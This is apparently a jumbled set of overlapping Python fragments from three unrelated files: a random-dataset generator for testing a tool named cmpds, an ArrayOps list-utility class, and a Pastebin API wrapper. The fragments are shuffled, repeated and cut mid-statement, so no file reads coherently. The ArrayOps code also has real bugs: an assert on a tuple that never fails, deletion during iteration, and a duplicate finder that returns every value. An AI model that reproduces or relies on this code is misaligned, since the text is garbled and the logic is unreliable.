"level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number",
"the SND for analysis. $ {0} -D -d 2 6 10 12 #",
"if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f",
"to enable the use of the SND for analysis. $ {0} -D 8",
"help='''The number of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true',",
"for analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975",
"random import sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a",
"f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__",
"a dataset that mocks runtimes between # 115 and 125 seconds per run",
"this help message and exit': 'Show this help message and exit.\\n ', }",
"specify which column to read in the dataset file. Typically you would want",
"typical call might be something like: n = 50 lower = 98 upper",
"= 101 ''' for i in range(n): r = random.uniform(lower, upper) yield r",
"point. ''' opts = getopts() num = opts.num[0] lower = opts.lower[0] upper =",
"program's version number and exit. \"\"\") # Positional arguments at the end. parser.add_argument('num',",
"License: MIT Open Source # Copyright (c) 2016 by <NAME> import argparse import",
"# Unfortunately I can't get rid of the \":\" reliably. def gettext(s): lookup",
"date = 2016-11-24 08:27:49.668509 # num = 8 # lower = 115.000 #",
"the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1,",
"Generate a datasets of n elements in the range [lower..upper]. A typical call",
"make them easier to read. That works because cmpds allows you to specify",
"nargs=1, action='store', type=int, help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1,",
"normal distribution (SND) for analysis. ''' # License: MIT Open Source # Copyright",
"elements to enable the use of the SND for analysis. $ {0} 8",
"115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3:",
"8 122.446 # Example 4: generate a dataset that mocks runtimes between #",
"'.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $ {0} -h #",
"verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version number and exit.",
"r def info(msg, f=1): ''' Write an info message to stdout. ''' lineno",
"bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num))",
"generate_dataset(num, lower, upper): if opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i,",
"116.212 2 122.327 3 118.571 4 120.238 5 124.852 6 119.652 7 116.400",
"at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number of elements in the",
"help='''The number of elements in the dataset. ''') parser.add_argument('lower', nargs=1, action='store', type=float, help='''The",
"dataset that mocks runtimes between # 115 and 125 seconds per run and",
"would want to generate at least 50 elements to enable the use of",
"= inspect.stack()[f][2] print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message",
"5 124.852 6 119.652 7 116.400 8 122.446 # Example 4: generate a",
"import random import sys VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate",
"Example 4: generate a dataset that mocks runtimes between # 10 and 12",
"use of the SND for analysis. $ {0} -D -d 2 6 10",
"action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper bound.",
"upper) yield r def info(msg, f=1): ''' Write an info message to stdout.",
"is used to create datasets to test cmpds. You can decorate the datasets",
"options using argparse. ''' # Trick to capitalize the built-in headers. # Unfortunately",
"analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358 123.128 121.975 124.312",
"might be something like: n = 50 lower = 98 upper = 101",
"'--decorate', action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the",
"help='''The upper bound. ''') opts = parser.parse_args() return opts def main(): ''' Main",
"use of the SND for analysis. $ {0} 8 115 125 124.409 121.153",
"# num = 6 # lower = 10.000 # upper = 12.000 #",
"A typical call might be something like: n = 50 lower = 98",
"def getopts(): ''' Get the command line options using argparse. ''' # Trick",
"headers. # Unfortunately I can't get rid of the \":\" reliably. def gettext(s):",
"VERSION = '0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of n",
"run. # Typically you would want to generate at least 50 # elements",
"122.446 # Example 4: generate a dataset that mocks runtimes between # 10",
"default=3, help='''The number of decimal places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate',",
"\"\"\") # Positional arguments at the end. parser.add_argument('num', nargs=1, action='store', type=int, help='''The number",
"ARGUMENTS', 'show this help message and exit': 'Show this help message and exit.\\n",
"lookup.get(s, s) argparse._ = gettext # to capitalize help headers base = os.path.basename(sys.argv[0])",
"can't get rid of the \":\" reliably. def gettext(s): lookup = { 'usage:",
"read in the dataset file. Typically you would want to generate at least",
"in the range [lower..upper]. A typical call might be something like: n =",
"'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example 1: help $ {0} -h",
"'--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is",
"print('WARNING:{} {}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message to stderr",
"testing. It is used to create datasets to test cmpds. You can decorate",
"the SND for analysis. $ {0} 8 115 125 124.409 121.153 116.976 115.358",
"nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The upper",
"print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for",
"bound. ''') opts = parser.parse_args() return opts def main(): ''' Main entry point.",
"works because cmpds allows you to specify which column to read in the",
"'Show this help message and exit.\\n ', } return lookup.get(s, s) argparse._ =",
"random.uniform(lower, upper) yield r def info(msg, f=1): ''' Write an info message to",
"to capitalize the built-in headers. # Unfortunately I can't get rid of the",
"I can't get rid of the \":\" reliably. def gettext(s): lookup = {",
"# Example 3: generate a dataset that mocks runtimes between # 115 and",
"capitalize help headers base = os.path.basename(sys.argv[0]) name = os.path.splitext(base)[0] usage = '\\n {0}",
"lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS', 'show this help",
"num = 6 # lower = 10.000 # upper = 12.000 # decimal",
"# 10 and 12 seconds with 2 decimal digits of precision. # Typically",
"places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower, upper): if",
"os import random import sys VERSION = '0.1' def generate_dataset(n, lower, upper): '''",
"epilog = r''' EXAMPLES: # Example 1: help $ {0} -h # Example",
"datasets to test cmpds. You can decorate the datasets with a header and",
"''' Generate a datasets of n elements in the range [lower..upper]. A typical",
"n = 50 lower = 98 upper = 101 ''' for i in",
"# decimal places = 2 1 10.30 2 11.48 3 10.50 4 10.25",
"11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser = argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places',",
"The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line numbers.",
"parser.add_argument('lower', nargs=1, action='store', type=float, help='''The lower bound. ''') parser.add_argument('upper', nargs=1, action='store', type=float, help='''The",
"the built-in headers. # Unfortunately I can't get rid of the \":\" reliably.",
"argparse.ArgumentParser(formatter_class=afc, description=desc[:-2], usage=usage, epilog=epilog) parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of",
"for analysis. $ {0} -D -d 2 6 10 12 # date =",
"a range for testing. It is used to create datasets to test cmpds.",
"than upper bound {}'.format(lower, upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num",
"to specify which column to read in the dataset file. Typically you would",
"i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places)",
"= {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i =",
"$ {0} -D 8 115 125 # date = 2016-11-24 08:27:49.668509 # num",
"125.000 # decimal places = 3 1 116.212 2 122.327 3 118.571 4",
"num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal",
"return opts def main(): ''' Main entry point. ''' opts = getopts() num",
"print('# num = {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('#",
"101 ''' for i in range(n): r = random.uniform(lower, upper) yield r def",
"the command line options using argparse. ''' # Trick to capitalize the built-in",
"upper = {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r",
"{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r)) if __name__ == '__main__': main()",
"runtimes between # 115 and 125 seconds per run and is decorated. #",
"lower = 115.000 # upper = 125.000 # decimal places = 3 1",
"reliably. def gettext(s): lookup = { 'usage: ': 'USAGE:', 'optional arguments': 'OPTIONAL ARGUMENTS',",
"easier to read. That works because cmpds allows you to specify which column",
"print('INFO:{} {}'.format(lineno, msg)) def warn(msg, f=1): ''' Write a warning message to stdout.",
"header and record counts to make them easier to read. That works because",
"to generate at least 50 # elements to enable the use of the",
"+= 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f = '{{:>10.{}f}}'.format(opts.decimal_places) print(f.format(r))",
"because cmpds allows you to specify which column to read in the dataset",
"-D -d 2 6 10 12 # date = 2016-11-24 08:30:31.039108 # num",
"the level of verbosity. ''') parser.add_argument('-V', '--version', action='version', version='%(prog)s v{0}'.format(VERSION), help=\"\"\"Show program's version",
"i in range(n): r = random.uniform(lower, upper) yield r def info(msg, f=1): '''",
"opts.upper[0] if lower > upper: err('lower bound {} must be less than upper",
"115.000 # upper = 125.000 # decimal places = 3 1 116.212 2",
"print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r in generate_dataset(num, lower,",
"to enable the use of the SND for analysis. $ {0} -D -d",
"upper)) if opts.decorate: print('# date = {}'.format(datetime.datetime.now())) print('# num = {}'.format(num)) print('# lower",
"type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default is %(default)s. ''')",
"124.409 121.153 116.976 115.358 123.128 121.975 124.312 122.044 # Example 3: generate a",
"6 119.652 7 116.400 8 122.446 # Example 4: generate a dataset that",
"getopts() num = opts.num[0] lower = opts.lower[0] upper = opts.upper[0] if lower >",
"s) argparse._ = gettext # to capitalize help headers base = os.path.basename(sys.argv[0]) name",
"= {:.3f}'.format(upper)) print('# decimal places = {}'.format(opts.decimal_places)) i = 0 for r in",
"type=float, help='''The upper bound. ''') opts = parser.parse_args() return opts def main(): '''",
"enable the use of the SND for analysis. $ {0} 8 115 125",
"cmpds. You can decorate the datasets with a header and record counts to",
"{}'.format(lineno, msg)) def err(msg, f=1): ''' Write an error message to stderr and",
"''') opts = parser.parse_args() return opts def main(): ''' Main entry point. '''",
"dataset that mocks runtimes between # 10 and 12 seconds with 2 decimal",
"err('lower bound {} must be less than upper bound {}'.format(lower, upper)) if opts.decorate:",
"124.312 122.044 # Example 3: generate a dataset that mocks runtimes between #",
"# Example 2: generate a dataset that mocks runtimes between # 115 and",
"# License: MIT Open Source # Copyright (c) 2016 by <NAME> import argparse",
"''' # License: MIT Open Source # Copyright (c) 2016 by <NAME> import",
"EXAMPLES: # Example 1: help $ {0} -h # Example 2: generate a",
"opts.decorate: i += 1 f = '{{:>5}} {{:>10.{}f}}'.format(opts.decimal_places) print(f.format(i, r)) else: f =",
"1 10.30 2 11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base)",
"and record counts to make them easier to read. That works because cmpds",
"= os.path.splitext(base)[0] usage = '\\n {0} [OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n",
"parser.add_argument('-d', '--decimal-places', action='store', type=int, metavar=('NUMBER'), default=3, help='''The number of decimal places. The default",
"3 118.571 4 120.238 5 124.852 6 119.652 7 116.400 8 122.446 #",
"message to stderr and exit. ''' lineno = inspect.stack()[f][2] sys.stderr.write('ERROR:{} {}\\n'.format(lineno, msg)) sys.exit(1)",
"places. The default is %(default)s. ''') parser.add_argument('-D', '--decorate', action='store_true', help='''Print header and line",
"entry point. ''' opts = getopts() num = opts.num[0] lower = opts.lower[0] upper",
"of the SND for analysis. $ {0} -D 8 115 125 # date",
"= 6 # lower = 10.000 # upper = 12.000 # decimal places",
"# Typically you would want to generate at least 50 # elements to",
"'0.1' def generate_dataset(n, lower, upper): ''' Generate a datasets of n elements in",
"[OPTIONS] <NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: #",
"3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser",
"10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc = argparse.RawTextHelpFormatter parser =",
"= {}'.format(num)) print('# lower = {:.3f}'.format(lower)) print('# upper = {:.3f}'.format(upper)) print('# decimal places",
"want to generate at least 50 elements to enable the use of the",
"that mocks runtimes between # 10 and 12 seconds with 2 decimal digits",
"file. Typically you would want to generate at least 50 elements to enable",
"dataset file. Typically you would want to generate at least 50 elements to",
"elements in the range [lower..upper]. A typical call might be something like: n",
"use of the standard normal distribution (SND) for analysis. ''' # License: MIT",
"2 11.48 3 10.50 4 10.25 5 10.52 6 11.34 '''.format(base) afc =",
"header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level of verbosity.",
"action='store_true', help='''Print header and line numbers. ''') parser.add_argument('-v', '--verbose', action='count', help='''Increase the level",
"125 seconds per run. # Typically you would want to generate at least",
"to enable the use of the SND for analysis. $ {0} 8 115",
"floating point numbers in a range for testing. It is used to create",
"<NUM> <LOWER> <UPPER>'.format(base) desc = 'DESCRIPTION:{0}'.format('\\n '.join(__doc__.split('\\n'))) epilog = r''' EXAMPLES: # Example"
] |
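# Usage sketch for the generator above: call generate_dataset() directly
# instead of going through the command line. The module name "gends" is an
# assumption; use whatever file name the script above is saved under.
import random

from gends import generate_dataset

random.seed(42)  # seeded only so this sketch prints reproducible values

for i, r in enumerate(generate_dataset(5, 115.0, 125.0), start=1):
    # Mirrors the decorated output of main() with the default 3 decimal places.
    print('{:>5} {:>10.3f}'.format(i, r))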
from typing import List


class ArrayOps(object):
    def __init__(self, input_array: List[int]):
        self._input = input_array

    def _validate_index(self, index):
        # The original asserted a (condition, message) tuple, which is always
        # truthy and never fails; assert the condition itself instead.
        assert index <= len(self._input), "Index can't be greater than length"

    def remove_at(self, index):
        '''Remove the element at index by shifting the tail left one slot.'''
        self._validate_index(index)
        i = index
        length = len(self._input)
        while i + 1 < length:
            self._input[i] = self._input[i + 1]
            i += 1
        self._input.pop(len(self._input) - 1)

    def insert_at(self, index, data):
        '''Overwrite the element at index in place.'''
        self._validate_index(index)
        self._input[index] = data

    def remove_duplicates(self):
        '''Drop repeated values, keeping the first occurrence of each.'''
        # The original deleted from self._input while iterating over its
        # indices, which skips elements and can raise IndexError; build the
        # deduplicated list first instead.
        dup_map = dict()
        deduped = []
        for i in range(len(self._input)):
            if self._input[i] not in dup_map:
                dup_map[self._input[i]] = i
                deduped.append(self._input[i])
        self._input[:] = deduped

    def find_duplicates(self):
        '''Return the values that occur more than once.'''
        dup_map = dict()
        for i in range(len(self._input)):
            if self._input[i] in dup_map:
                dup_map[self._input[i]] += 1
            else:
                dup_map[self._input[i]] = 1
        # The original returned every key; the duplicates are the keys whose
        # count is greater than one.
        return [value for value, count in dup_map.items() if count > 1]
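# Usage sketch for the ArrayOps class above; assumes it is defined in (or
# importable into) the same module. Values and expected output are illustrative.
ops = ArrayOps([3, 1, 3, 2, 1, 3])
print(ops.find_duplicates())  # values seen more than once: [3, 1]
ops.remove_duplicates()
print(ops._input)             # first occurrences kept in order: [3, 1, 2]
ops.remove_at(0)
print(ops._input)             # [1, 2]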
# Pastebin Wrapper
# By Optixal
# Pastebin Documentation: https://pastebin.com/api
import os
import requests

# Precedence of Confidential Information:
# Environment Variable > Function Argument > Constant Defined Here
# Recommended: Set confidential information as environment variables with
# "export PASTEBIN_DEV_KEY=abc123". You can store the "export" commands
# within a file named "keys".
# Fill these in or export the matching environment variables.
PASTEBIN_DEV_KEY = ''
PASTEBIN_USER_NAME = ''
PASTEBIN_USER_PASSWORD = ''


# Pastes code/text anonymously to Pastebin
# Returns: paste_url, the URL containing the paste
def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste',
          paste_private=0, paste_name='', paste_expire_date='N',
          paste_format='text'):
    data = {
        'api_dev_key': os.getenv('PASTEBIN_DEV_KEY', dev_key),
        'api_user_key': user_key,
        'api_option': option,
        'api_paste_private': str(paste_private),
        'api_paste_name': paste_name,
        'api_paste_expire_date': paste_expire_date,
        'api_paste_format': paste_format,
        'api_paste_code': paste_code,
    }
    url = 'https://pastebin.com/api/api_post.php'
    r = requests.post(url, data=data)
    if r.status_code == 200 and 'Bad' not in r.text:
        return r.text
    else:
        raise PasteError(r.text)


class PasteError(Exception):
    def __init__(self, response):
        self.response = response

    def __str__(self):
        return repr(self.response)


# Authenticate with Pastebin with username and password
# Returns: user_key, a session key used when pasting a non-guest paste
def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME,
          user_password=PASTEBIN_USER_PASSWORD):
    data = {
        'api_dev_key': os.getenv('PASTEBIN_DEV_KEY', dev_key),
        'api_user_name': os.getenv('PASTEBIN_USER_NAME', user_name),
        'api_user_password': os.getenv('PASTEBIN_USER_PASSWORD', user_password),
    }
    url = 'https://pastebin.com/api/api_login.php'
    r = requests.post(url, data=data)
    if r.status_code == 200 and 'Bad' not in r.text:
        return r.text
    else:
        raise PasteError(r.text)
"Defined Here # Recommended: Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\".",
"else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def __str__(self):",
"Information: # Environment Variable > Function Argument > Constant Defined Here # Recommended:",
"user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200",
"'' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin",
"os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url,",
": os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code",
"Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information: # Environment",
"url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad'",
"= { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD',",
"# Recommended: Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can",
"\"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = ''",
"URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'):",
"confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\"",
"dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name,",
"r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response =",
"user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date,",
"with username and password # Returns: user_key, a session key used when pasting",
"'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code",
"the \"export\" commands within a file named \"keys\" as well and run \"source",
"not in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response):",
"paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' :",
"os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' :",
"anonymously to Pastebin # Returns: paste_url, the URL containing the paste def paste(paste_code,",
"dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY',",
"return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response",
"as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within",
"# Returns: paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste',",
"str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code,",
"in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response",
"environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands within a",
"Function Argument > Constant Defined Here # Recommended: Set confidential information as environment",
"containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data",
": user_key, 'api_option' : option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' :",
": str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' :",
"user_key, a session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME,",
"user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data)",
"data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' :",
"'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code'",
"# Environment Variable > Function Argument > Constant Defined Here # Recommended: Set",
"can store the \"export\" commands within a file named \"keys\" as well and",
"'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r",
"{ 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password),",
"= '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to",
"paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = {",
"PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response def __str__(self): return repr(self.response)",
"Precedence of Confidential Information: # Environment Variable > Function Argument > Constant Defined",
"200 and 'Bad' not in r.text: return r.text else: raise PasteError(r.text) class PasteError(Exception):",
"data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option,",
"paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200",
"information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the \"export\" commands",
"within a file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY =",
"store the \"export\" commands within a file named \"keys\" as well and run",
": paste_expire_date, 'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r",
"Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You can store the",
"the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data =",
"= 'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not",
"Here # Recommended: Set confidential information as environment variables with \"export PASTEBIN_DEV_KEY=abc123\". You",
"paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name'",
"} url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200 and",
"r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response =",
"url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad'",
"self.response = response def __str__(self): return repr(self.response) # Authenticate with Pastebin with username",
"def __init__(self, response): self.response = response def __str__(self): return repr(self.response) # Authenticate with",
"as well and run \"source keys\". PASTEBIN_DEV_KEY = '' PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD",
"Returns: paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY, user_key='', option='paste', paste_private=0,",
"Constant Defined Here # Recommended: Set confidential information as environment variables with \"export",
"response def __str__(self): return repr(self.response) # Authenticate with Pastebin with username and password",
"return r.text else: raise PasteError(r.text) class PasteError(Exception): def __init__(self, response): self.response = response",
"in r.text: return r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response",
"user_key='', option='paste', paste_private=0, paste_name='', paste_expire_date='N', paste_format='text'): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key),",
"# Authenticate with Pastebin with username and password # Returns: user_key, a session",
"You can store the \"export\" commands within a file named \"keys\" as well",
"raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def __str__(self): return",
"= { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private'",
"response): self.response = response def __str__(self): return repr(self.response) # Authenticate with Pastebin with",
"a session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>):",
"os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if r.status_code ==",
"'https://pastebin.com/api/api_post.php' r = requests.post(url, data=data) if r.status_code == 200 and 'Bad' not in",
"Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information: # Environment Variable",
"'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_key' : user_key, 'api_option' : option, 'api_paste_private' : str(paste_private),",
"code/text anonymously to Pastebin # Returns: paste_url, the URL containing the paste def",
"def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' :",
"commands within a file named \"keys\" as well and run \"source keys\". PASTEBIN_DEV_KEY",
"PASTEBIN_USER_NAME = '' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin #",
"== 200 and 'Bad' not in r.text: return r.text else: raise PasteError(r.text) class",
"to Pastebin # Returns: paste_url, the URL containing the paste def paste(paste_code, dev_key=PASTEBIN_DEV_KEY,",
"repr(self.response) # Authenticate with Pastebin with username and password # Returns: user_key, a",
"r.text else: raise LoginError(r.text) class LoginError(Exception): def __init__(self, response): self.response = response def",
"Returns: user_key, a session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY,",
": option, 'api_paste_private' : str(paste_private), 'api_paste_name' : paste_name, 'api_paste_expire_date' : paste_expire_date, 'api_paste_format' :",
"dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME', user_name), 'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php'",
"login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data = { 'api_dev_key' : os.getenv('PASTEBIN_DEV_KEY', dev_key), 'api_user_name' : os.getenv('PASTEBIN_USER_NAME',",
"'api_paste_format' : paste_format, 'api_paste_code' : paste_code, } url = 'https://pastebin.com/api/api_post.php' r = requests.post(url,",
"'api_user_password' : os.getenv('PASTEBIN_USER_PASSWORD', user_password), } url = 'https://pastebin.com/api/api_login.php' r = requests.post(url, data=data) if",
"data=data) if r.status_code == 200 and 'Bad' not in r.text: return r.text else:",
"'' PASTEBIN_USER_PASSWORD = '' # Pastes code/text anonymously to Pastebin # Returns: paste_url,",
"session key used when pasting a non-guest paste def login(dev_key=PASTEBIN_DEV_KEY, user_name=PASTEBIN_USER_NAME, user_password=<PASSWORD>): data",
"Wrapper # By Optixal # Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence",
"and password # Returns: user_key, a session key used when pasting a non-guest",
"# Pastebin Documentation: https://pastebin.com/api import requests, os # Precedence of Confidential Information: #",
